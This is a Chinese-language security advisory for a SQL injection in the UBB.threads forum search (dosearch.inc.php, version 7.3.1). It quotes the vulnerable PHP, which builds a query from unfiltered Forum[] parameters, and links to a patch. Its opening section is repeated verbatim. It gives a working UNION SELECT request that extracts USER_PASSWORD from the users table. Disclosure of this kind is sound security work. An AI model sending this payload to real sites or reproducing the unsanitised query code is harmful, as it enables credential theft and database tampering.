BUGTRAQ ID: 31074 CNCAN ID:CNCAN-2008091108 UBB.threads是一款基于PHP的论坛程序。 UBB.threads搜索功能存在SQL注入攻击,远程攻击者可以利用漏洞获得敏感信息或操作数据库。 问题存在于dosearch.inc.php // The forums we are searching will be in a different format // depending on where we are coming from if (@is_array($_POST['Forum'])) { $Forum = join(",",$_POST['Forum']); } elseif (@is_array($_GET['Forum'])) { $Forum = join(",",$_GET['Forum']); } elseif (isset($_POST['Forum'])) { $Forum = ",{$_POST['Forum']},"; } elseif (isset($_GET['Forum'])) { $Forum = ",{$_GET['Forum']},"; } else { $Forum = ""; } 如上代码中,$Forum变量分配给未初始化的GPC数据,基于几个不同的条件,就会执行如下代码: // Now we need to figure out what forums we are searching $catin = ""; $boardin = ""; $allforums = ""; $forumlist = ""; $Forum = split(",",$Forum); for($i=0;$i $kids) { if (in_array($bnum,$kids) && !preg_match("/'$fid'/",$boardin)) { $boardin .="'$fid',"; } // end if } //...
BUGTRAQ ID: 31074 CNCAN ID:CNCAN-2008091108 UBB.threads是一款基于PHP的论坛程序。 UBB.threads搜索功能存在SQL注入攻击,远程攻击者可以利用漏洞获得敏感信息或操作数据库。 问题存在于dosearch.inc.php // The forums we are searching will be in a different format // depending on where we are coming from if (@is_array($_POST['Forum'])) { $Forum = join(",",$_POST['Forum']); } elseif (@is_array($_GET['Forum'])) { $Forum = join(",",$_GET['Forum']); } elseif (isset($_POST['Forum'])) { $Forum = ",{$_POST['Forum']},"; } elseif (isset($_GET['Forum'])) { $Forum = ",{$_GET['Forum']},"; } else { $Forum = ""; } 如上代码中,$Forum变量分配给未初始化的GPC数据,基于几个不同的条件,就会执行如下代码: // Now we need to figure out what forums we are searching $catin = ""; $boardin = ""; $allforums = ""; $forumlist = ""; $Forum = split(",",$Forum); for($i=0;$i $kids) { if (in_array($bnum,$kids) && !preg_match("/'$fid'/",$boardin)) { $boardin .="'$fid',"; } // end if } // end foreach } } } $catin = preg_replace("/,$/","",$catin); $boardin = preg_replace("/,$/","",$boardin); $forumlist = preg_replace("/,$/","",$forumlist); if ($catin) { $catin = "CATEGORY_ID IN ($catin)"; if ($boardin) { $catin .= " OR "; } } if ($boardin) { $boardin = "FORUM_ID IN ($boardin)"; } if (!$catin && !$boardin) { $catin = "1"; } // Regular query here, since all query vars come from within the script $query = " SELECT FORUM_ID,FORUM_TITLE,CATEGORY_ID,FORUM_IS_ACTIVE FROM {$config['TABLE_PREFIX']}FORUMS WHERE FORUM_IS_ACTIVE = '1' AND ($catin $boardin) "; $sth = $dbh -> do_query($query,__LINE__,__FILE__); $boardin = ""; 由于逗号和部分字符被过滤,封装在单引号中发送给$Forum数组,所以难于利用,但是构建如下的搜索可成功的执行恶意SQL查询: ubb=dosearch &fromsearch=1 &Words=test &Forum[]=f-99')) UNION SELECT '1 &Forum[]=f' %2b MID('' %2b USER_PASSWORD %2b ' &Forum[]=f1 &Forum[]=f1') %2b ' &Forum[]=f1 &Forum[]=f1' FROM ubbt_USERS/* Groupee UBB.threads 7.3.1 可参考如下链接获得补丁信息: <a href=http://www.ubbcentral.com/forums/ubbthreads.php/topics/216722/ target=_blank>http://www.ubbcentral.com/forums/ubbthreads.php/topics/216722/</a>
